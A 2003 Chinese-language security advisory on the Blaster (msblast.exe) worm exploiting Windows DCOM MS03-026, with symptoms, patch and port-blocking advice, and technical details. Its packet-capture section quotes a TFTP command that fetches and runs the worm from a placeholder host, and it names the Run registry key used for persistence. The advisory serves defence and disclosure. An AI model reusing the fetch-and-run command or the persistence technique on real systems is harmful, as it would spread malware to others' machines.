8月12日，凌晨1点26分，启明星辰信息技术有限公司积极防御实验室，首先发现利用Windows DCOM MS03-26漏洞为攻击途径的蠕虫病毒已经在国内出现。

　　该蠕虫病毒将会感染Windows 2000、Windows XP和Windows Server 2003系统，如果不及时预防，此蠕虫可能会在几天内快速传播、大规模感染网络，对网络安全造成严重危害，甚至其危害程度将超过SQL SLAMMER蠕虫(据不完全统计，SQL-SLAMMER蠕虫已经在全球造成了几十亿美元的损失)。

　　有关Windows DCOM MS03-26漏洞的详细分析，启明星辰信息技术有限公司积极防御实验室已经于7月25日发布了详细分析报告，并向所有用户与合作伙伴发出了风险提示信息。。该蠕虫病毒发作时主要表现为：不断扫描计算机的135端口，在局域网中会发现大量的RPC包，因为攻击的成功率不高，所以会导致被攻击的计算机反复重新启动；如果被攻击成功，则会导致许多与RPC(远程过程调用)相关的功能无法使用，如无法利用鼠标右键“复制”、“粘贴”，以及使一些RPC相关的网络功能无法使用，并使得Windows系统极不稳定；此蠕虫将在特殊时段内对windowsupdate.com自动进行DOS攻击，导致网络带宽堵塞，严重影响网络的正常使用；同时，被蠕虫病毒感染(或攻陷)的计算机，会不断扫描其他计算机的135端口，并且重复攻击的全过程。启明星辰公司已经获得了此蠕虫的病毒体。

　　启明星辰公司积极防御实验室建议：用户应该尽快关闭135/TCP端口，并尽可能关闭135-139、445与593端口；同时，启明星辰积极防御实验室已就此蠕虫病毒编写了专用除毒程序，请至启明星辰公司网站下载www.venustech.com.cn。同时，微软公司也提供了针对此漏洞的补丁程序，如下：http://www.microsoft.com/technet/security/bulletin/MS03-026.asp。此外，请用户尽快到启明星辰网站用户升级中心，升级天阗(tián)入侵检测系统最新事件库。

　　附：Windows Dcom蠕虫安全通告

　　蠕虫发现日期：

　　2003年8月11日

　　紧急程度：高

　　危害程度：高

　　蠕虫描述：

　　-------------------

　　从8月11日利用Windows DCOM MS03-26漏洞(对此漏洞的详细分析请见启明星辰网站)为攻击途径的蠕虫病毒开始在国内出现，此蠕虫可能会在这几天内快速的传播如果不及时预防可能会使蠕虫大规模感染网络,这会对网络安全造成严重危害。

　　下图为2003年8月11日此蠕虫在国外传播的速度：

　　蠕虫技术细节描述：

　　--------------------------

　　感染途径：

　　1.首先源计算机向被感染机135 tcp端口使用dcom.c Windows RPC DCOM漏洞的攻击程序进行攻击

　　2.如果攻击成功将会在被攻击计算机上的4444端口上绑定一个shell

　　3.通过shell执行 tftp get命令从其他tftp上下载蠕虫程序并且运行

　　蠕虫名为：msblast.exe，蠕虫被UPX加密过大小为6kBytes，解压后大小为11kByte。

　　4.蠕虫运行后会接着扫描其他漏洞计算机，并向注册表里加一个键值使计算机在从新启动后执行自己

　　键名为:

　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'

　　键值为：msblast.exe

　　蠕虫特征属性：

　　--------------------

　　1.此蠕虫会传染Windows 2000和XP，该蠕虫使用了针对这个两个Windows版本的偏移量。攻击时蠕虫会按照80% XP与20% Windows 2000的比率来挑选一种偏移量，所以在攻击时如果偏移量和系统版本不匹配攻击就不会成功。

　　2.此蠕虫在特殊时段内会对windowsupdate.com进行DOS攻击，蠕虫会检查系统时间，如果系统时间在8月15到12月31日之间就会执行DOS攻击。

　　3.蠕虫IP选择规律是按照本地网络优先的顺序的，首先蠕虫会从本地网络开始：A.B.C.D，D得值为0，如果C大于20会减去一个小于20得随机数，然后蠕虫会以这个数开始递增的顺序攻击，所以当本地网内有机器被感染时，本地网络流量中会有大量的135端口的数据。

　　4.在受感染机器4444端口抓包为：

　　tftp -i aaa.bbb.ccc.ddd GET msblast.exe

　　start msblast.exe

　　msblast.exe

　　HTTP/1.0 403 Forbidden

　　Server: AdSubtract 2.50

　　Content-Type: text/html;charset=utf-8

　　Content-Length: 349

　　<html>

　　<head>

　　<meta http-equiv="Pragma" content="no-cache">

　　<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

　　<title>Forbidden</title>

　　</head>

　　<body>

　　<h1>Forbidden</h1>

　　<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not

　　allowed; only requests from localhost (127.0.0.1) are allowed.

　　</h2>

　　</body></html>